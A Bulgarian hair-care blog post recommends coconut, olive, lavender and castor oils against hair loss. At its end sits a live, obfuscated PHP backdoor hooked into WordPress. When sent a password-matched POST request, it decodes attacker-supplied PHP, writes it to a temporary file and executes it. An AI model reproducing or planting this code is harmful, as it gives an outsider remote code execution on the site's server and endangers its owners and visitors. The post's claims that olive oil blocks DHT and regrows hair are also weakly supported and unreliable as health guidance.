Масла срещу косопад и за здрава коса – част 1 | Косопад

Масла срещу косопад и за здрава коса – част 1

zehtin-1

Маслата са сред най- полезните продукти за здравето на косата ни. Можем да си правим масажи с тях, а резултатът ще е красива и силна коса. Ето някои от най- разпространените:

Кокосово масло

Хиляди години назад, това масло се е използвало за предпазване, почистване и подхранване на косата. Химическото съединение на маслото (триглицериди от средна верига) минава лесно през клетъчната мембрана на косата, за да проникне дълбоко в косата. Това позволява на кокосовото масло да избегне загубата на протеини и да замести естествените масла на косата, която ежедневно е изложена на токсини.

Зехтин

Хормонът дехидротестостерон (ДХТ) заключва косата за растеж и намалява размерите на космените фоликули. Смята се, че именно този хормон е сред основните причини за мъжкото оплешивяване. Зехтинът блокира ДХТ и помага за естествения растеж на косата. Тъй като съдържа много антиоксиданти, зехтинът освобождава кожата от свободни радикали, стимулира кръвообращението и доставя полезни вещества на скалпа.

lavandula-balsam

Лавандулово масло

Това е едно от най- известните масла, които действат срещу косопада. Освен че предпазва от косопад, лавандуловото масло е и антисептик. Дезинфекциращите му свойства предпазват скалпа от различни инфекции, като гъбички, микроби и пр.

Рициново масло

Притежава множество свойства, като едно от тях е насочено и срещу косопада. Рициновото масло съдържа рицинолова киселина: силен антибактериален агент, който предпазва скалпа от инфекции. Мастните киселини, които съдържа, действат хидратиращо и подхранват косата.

14. май 2015 19:13:54 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}